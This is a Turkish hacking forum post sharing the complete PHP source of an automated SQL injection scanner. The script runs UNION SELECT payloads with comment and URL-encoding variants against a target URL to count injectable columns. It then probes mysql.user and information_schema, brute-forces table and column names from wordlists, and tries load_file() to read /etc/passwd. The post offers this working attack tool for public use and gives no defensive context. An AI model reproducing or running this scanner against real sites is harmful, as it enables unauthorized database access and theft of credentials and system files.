THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

F-Security-Sql İnj. Scanner v1

BlacksGuardian - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2012
Nereden:
Underground
Mesajlar:
310
Konular:
18
Teşekkür (Etti):
20
Teşekkür (Aldı):
34
Ticaret:
(0) %
11-06-2013 00:42
#1
F-Security-Sql İnj. Scanner v1
public :$

Kod:
<?php 
error_reporting(0);
@set_time_limit(0); 
/* 
F-Security - Sql InyeXion Scanner v1 
Desarrollado por Knet 
Adminitradores - www.remoteexecution.org 
Contacto: 
Keynet.security@Gmail.com [ Mail ] 
Keynet.security@Hotmail.com [ Msn ] 
*/ 
$web=$_POST['web']; 
$end=$_POST['end']; 
$scann=$_POST['scann']; 
$union=$_POST['union']; 
$max=$_POST['max']; 
$from_format=$_POST['from']; 
$MySqluser=$_POST['MySqluser']; 
$InforMationSchema=$_POST['InforMationSchema']; 
$TblBrt=$_POST['TblBrt']; 
$TblFormat=$_POST['TblFormat']; 
$ColBrt=$_POST['ColBrt']; 
$ColFormat=$_POST['ColFormat']; 
$LdFl=$_POST['LdFl']; 
$string='err0r'; 
$union_array=array( 
'-1+UNION+SELECT+', 
'-1\'+UNION+SELECT+', 
'-1+UNION+ALL+SELECT+', 
'-1\'+UNION+ALL+SELECT+', 
'-1/**/UNION/**/SELECT/**/', 
'-1\'/**/UNION/**/SELECT/**/', 
'-1/**/UNION/**/ALL/**/SELECT/**/', 
'-1\'/**/UNION/**/ALL/**/SELECT/**/', 
'1+UNION+SELECT+', 
'1\'+UNION+SELECT+', 
'1+UNION+ALL+SELECT+', 
'1\'+UNION+ALL+SELECT+', 
'1/**/UNION/**/SELECT/**/', 
'1\'/**/UNION/**/SELECT/**/', 
'1/**/UNION/**/ALL/**/SELECT/**/', 
'1\'/**/UNION/**/ALL/**/SELECT/**/' 
); 
$count_union_array=count($union_array) + 1; 
$from_array=array( 
'+from+', 
'/**/from/**/', 
'+FROM+', 
'/**/FROM/**/', 
'%20from%20', 
'%20FROM%20' 
); 
$count_from_array=count($from_array) + 1; 
$from=$from_array[$from_format]; 
$iny_1=$union_array[$union]; 
$iny_2='0x'.bin2hex($string); 
$iny_3='0x'.bin2hex($string); 
if($max<3 || $max=="" || !is_numeric($max)) 
{ 
$max=3; 
} 
?> 
<form action="" method="POST"> 
<table> 
<tr> 
<td><h1>Sql InyeXion Scanner F-Security Team</h1></td> 
</tr> 
<tr> 
<td>Web: 
<input id="boton" type="text" name="web" value=" 
<?php if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?> 
" size="60"> 
</td> 
<td>Union*: 
<SELECT name="union" size="1" id="boton"> 
<?php 
for($union_for=0;$union_for<=$count_union_array;$union_for++) 
{ 
if($union_array[$union_for]!="") 
{ 
echo '<OPTION VALUE="'.$union_for.'">'.$union_array[$union_for].'</OPTION>'."\n"; 
} 
} 
?> 
</SELECT> 
<td>Max columns: 
<SELECT name="max" size="1" id="boton"> 
<?php 
for($max_a=1;$max_a<=255;$max_a++) 
{ 
echo '<OPTION VALUE="'.$max_a.'">'.$max_a.'</OPTION>'."\n"; 
} 
?> 
</SELECT> 
</td> 
<td>eND: 
<input id="boton" type="text" name="end" value=" 
<?php if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10"> 
</td> 
</tr> 
</table> 
<table> 
<tr> 
<td>From* Format: 
<td> 
<SELECT name="from" size="1" id="boton"> 
<?php 
for($from_for=0;$from_for<=$count_from_array;$from_for++) 
{ 
if($from_array[$from_for]!="") 
{ 
echo '<OPTION VALUE="'.$from_for.'">'.$from_array[$from_for].'</OPTION>'."\n"; 
} 
} 
?> 
</SELECT> 
</td> 
</tr> 
</table> 
<table> 
<tr> 
<td>Test mysql.user:</td> 
<td>Yes</td> 
<td><input type="radio" name="MySqluser" value="S" checked></td> 
<td>No</td> 
<td><input type="radio" name="MySqluser" value="N"></td> 
</tr> 
<tr> 
<td>Test information_schema:</td> 
<td>Yes</td> 
<td><input name="InforMationSchema" type="radio" value="S" checked="checked"></td> 
<td>No</td> 
<td><input type="radio" name="InforMationSchema" value="N"></td> 
</tr> 
<tr> 
<td>Tables BruteForce:</td> 
<td>Yes</td> 
<td><input name="TblBrt" type="radio" value="S" checked="checked"></td> 
<td>No</td> 
<td><input type="radio" name="TblBrt" value="N"></td> 
<td>|</td> 
<td>tablename</td> 
<td><input type="radio" name="TblFormat" value="1" checked></td> 
<td>|</td> 
<td>TableName</td> 
<td><input type="radio" name="TblFormat" value="2"></td> 
<td>|</td> 
<td>TABLENAME</td> 
<td><input type="radio" name="TblFormat" value="3"></td> 
</tr> 
<tr> 
<td>Columns BruteForce:</td> 
<td>Yes</td> 
<td><input name="ColBrt" type="radio" value="S" checked="checked"></td> 
<td>No</td> 
<td><input type="radio" name="ColBrt" value="N"></td> 
<td>|</td> 
<td>columname</td> 
<td><input type="radio" name="ColFormat" value="1" checked></td> 
<td>|</td> 
<td>ColumName</td> 
<td><input type="radio" name="ColFormat" value="2"></td> 
<td>|</td> 
<td>COLUMNAME</td> 
<td><input type="radio" name="ColFormat" value="3"></td> 
</tr> 
<tr> 
<td>Test load_file():</td> 
<td>Yes</td> 
<td><input type="radio" name="LdFl" value="S" checked></td> 
<td>No</td> 
<td><input type="radio" name="LdFl" value="N"></td> 
</tr> 
<tr> 
<td><input id="boton" type="submit" name="scann" value="Scann"></td> 
</tr> 
</table> 
<table> 
<tr> 
<td> 
<?php 
if(isset($scann) && $web!="") 
{ 
for($a_for=1;$a_for<=$max;$a_for++) 
{ 
$iny_2=$iny_2.'2d'.bin2hex($a_for); 
$iny=$web.$iny_1.$iny_2; 
$webmas = $iny; 
$contenido = @file_get_contents($webmas.$end); 
$alert = strpos($contenido,$string); 
if(!$alert) 
{ 
$iny_2=$iny_2.','.$iny_3; 
$iny_vuln .= $a_for.','; 
} 
else 
{ 
$f_num=$a_for; 
$web_final=$web.$iny_1.$iny_vuln.$f_num; 
//echo $webmas; 
echo '[+] Bug Found in: '.$a_for."<br>".'<a href="'.htmlentities($web_final.$end). 
'" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>"; 
echo 'vuln in num/s: |'; 
/*********************************SALVANDO********* ******************************/ 
$_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for. 
"<br>".'<a href="'.htmlentities($web_final.$end). 
'" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>".'vuln in num/s: |'; 
/*********************************SALVANDO********* ******************************/ 
$vulns=array(); 
for($search_for=1;$search_for<=$a_for;$search_for++) 
{ 
if(strpos($contenido,$string.'-'.$search_for)) 
{ 
echo $search_for.'|'; 
/*********************************SALVANDO********* ************* 
*****************/ 
$_SESSION['all_saveds'] .= $search_for.'|'; 
/*********************************SALVANDO********* ************* 
*****************/ 
array_push($vulns,$search_for); 
} 
} 
/*********************************SALVANDO********* ******************************/ 
$_SESSION['all_saveds'] .= "<br>".'---------------------------------------------'. 
'------------------------------------------------'."<br>"; 
/*********************************SALVANDO********* ******************************/ 
echo "<br>".'---------------------------------------------'. 
'------------------------------------------------'."<br>"; 
$a_for=$max; 
define('vuln','yes'); 
} 
if(!$alert && $a_for==$max) 
{ 
echo 'no vuln in 1->'.$max."\n"; 
} 
$contenido=''; 
} 
} 
/* FINAL SIMPLE SCANN */ 
if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S") 
{ 
$from_mysql_user=$from.'mysql.user'; 
$contenido = @file_get_contents($webmas.$from_mysql_user.$end); 
$alert_mysql_user = strpos($contenido,$string); 
if($alert_mysql_user) 
{ 
echo '[+] MySQL Database Found:'.'<br>'; 
echo '<a href="'.htmlentities($web_final.$from_mysql_user.$end).'" TARGET=BLANK>'. 
htmlentities($web_final.$from_mysql_user.$end).'</a>'."<br>"; 
echo '[+] Columns default in mysql.user: Host,User,Password'.'<br>'; 
} 
else 
{ 
echo '[+] MySQL Database not Found:'.'<br>'; 
} 
echo '-------------------------------'."<br>"; 
} 
/* FINAL Mysql.user TEST */ 
if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S") 
{ 
$from_information_schema=$from.'information_schema .tables'; 
$contenido = @file_get_contents($webmas.$from_information_schema.$end); 
$alert_information_schema = strpos($contenido,$string); 
if($alert_information_schema) 
{ 
echo '[+] Information_Schema Database Found:'.'<br>'; 
echo '<a href="'.htmlentities($web_final.$from_information_schema .$end).'" TARGET=BLANK>'. 
htmlentities($web_final.$from_information_schema.$end).'</a>'."<br>"; 
echo '[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.'<br>'; 
echo '---------------'."<br>"; 
echo '[+] Columns default in information_schema.columns: 
TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'.'<br>'; 
} 
else 
{ 
echo '[+] Information_Schema Database not Found:'.'<br>'; 
} 
echo '-------------------------------'."<br>"; 
} 
/* FINAL information_schema database */ 
if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat)) 
{ 
switch($TblFormat) 
{ 
case 1: 
$file_txt_tables='1.txt'; 
break; 
case 2: 
$file_txt_tables='2.txt'; 
break; 
case 3: 
$file_txt_tables='3.txt'; 
break; 
default: 
$file_txt_tables='1.txt'; 
} 
$file_tables=@file($file_txt_tables); 
$count_tables=count($file_tables); 
for($t_for=0;$t_for<=$count_tables;$t_for++) 
{ 
$file_tables[$t_for]=trim($file_tables[$t_for]); 
if($file_tables[$t_for] != "") 
{ 
$from_table=$from.$file_tables[$t_for]; 
$contenido = @file_get_contents($webmas.$from_table.$end); 
$alert_table = strpos($contenido,$string); 
if($alert_table) 
{ 
echo '[+] Table Found: '.$file_tables[$t_for]."<br>"; 
echo '<a href="'.htmlentities($web_final.$from_table.$end).'" TARGET=BLANK>'. 
htmlentities($web_final.$from_table.$end).'</a>'."<br>"; 
/* 
echo 'webmas:'.$webmas.'<br>'; 
echo 'webfinal:'.$web_final.'<br>'; 
echo 'web:'.$web.'<br>'; 
*/ 
if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat)) 
{ 
/************************************************** ************** 
*******/ 
switch($ColFormat) 
{ 
case 1: 
$file_txt_columns='1.txt'; 
break; 
case 2: 
$file_txt_columns='2.txt'; 
break; 
case 3: 
$file_txt_columns='3.txt'; 
break; 
default: 
$file_txt_columns='1.txt'; 
} 
$file_columns=@file($file_txt_columns); 
$count_columns=count($file_columns); 
$count_vulns=count($vulns); 
$count_vulns = $count_vulns + 1; 
for($c_for=0;$c_for<=$count_columns;$c_for++) 
{ 
$file_columns[$c_for]=trim($file_columns[$c_for]); 
if($file_columns[$c_for] != "") 
{ 
for($cols_for=1;$cols_for<=$f_num;$cols_for++) 
{ 
if(in_array($cols_for,$vulns)) 
{ 
if($cols_for != $f_num) 
{ 
$cols_brt_string .= 'concat(0x'.bin2hex($string). 
','. 
$file_columns[$c_for].'),'; 
} 
else 
{ 
$cols_brt_string .= 'concat(0x'.bin2hex($string). 
','. 
$file_columns[$c_for].')'; 
} 
} 
else 
{ 
if($cols_for != $f_num) 
{ 
$cols_brt_string .= $cols_for.','; 
} 
else 
{ 
$cols_brt_string .= $cols_for; 
} 
} 
} 
$col_contenido=@file_get_contents($web. 
$iny_1.$cols_brt_string.$from_table.$end); 
$alert_col = strpos($col_contenido,$string); 
if($alert_col) 
{ 
if($cols_vulns=="") 
{ 
$cols_vulns = 
$file_columns[$c_for]; 
} 
else 
{ 
$cols_vulns .= ','. 
$file_columns[$c_for]; 
} 
/* 
$cols_brt_string=str_replace('concat(0x'.bin2hex($ string).',','', 
$cols_brt_string); 
$cols_brt_string=str_replace(')','', 
$cols_brt_string); 
echo '[+] Column Found in '. 
$file_tables[$t_for]. 
': '.$file_columns[$c_for].'<br>'; 
echo '<a href="'. 
htmlentities($web. 
$iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'. 
htmlentities($web. 
$iny_1.$cols_brt_string.$from_table.$end).'</a>'."<br>"; 
*/ 
} 
$cols_brt_string=''; 
}/**/ 
} 
if($cols_vulns!="") 
{ 
echo '[+] Column/s Found in '.$file_tables[$t_for].' : '. 
$cols_vulns.'<br>'; 
$cols_vulns=''; 
} 
/************************************************** ************** 
*******/ 
} 
echo '-------------------------------'."<br>"; 
} 
} 
} 
} 
/* FINAL TABLE AND COLUMNS BRUTEFORCE */ 
if(vuln=="yes" && isset($LdFl) && $LdFl=="S") 
{ 
$string_alert_loadfile = 'root:x:'; 
for($load_file_for=1;$load_file_for<=$f_num;$load_file_for++) 
{ 
if(in_array($load_file_for,$vulns) && load_file!="yes") 
{ 
if($load_file_for != $f_num) 
{ 
$load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.','; 
} 
else 
{ 
$load_file_string .= 'load_file('.$load_file_for.')'; 
} 
define('load_file','yes'); 
} 
else 
{ 
if($load_file_for != $f_num) 
{ 
$load_file_string .= $load_file_for.','; 
} 
else 
{ 
$load_file_string .= $load_file_for; 
} 
} 
} 
$web_load=$web.$iny_1.$load_file_string.$end; 
$contenido_load = @file_get_contents($web_load); 
$alert_load_file = strpos($contenido_load,$string_alert_loadfile); 
echo '[+] load_file(): '; 
if($alert_load_file) 
{ 
echo 'ENABLED'.'<br>'; 
echo '<a href="'.htmlentities($web_load).'" TARGET=BLANK>'. 
htmlentities($web_load).'</a>'."<br>"; 
} 
else 
{ 
echo 'DISABLED'.'<br>'; 
} 
echo '-------------------------------'."<br>"; 
} 
/* FINAL LOAD_FILE() TEST */ 
?>
--------------------- Hükmün Yetiyorsa Sorgula

TurkSec

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler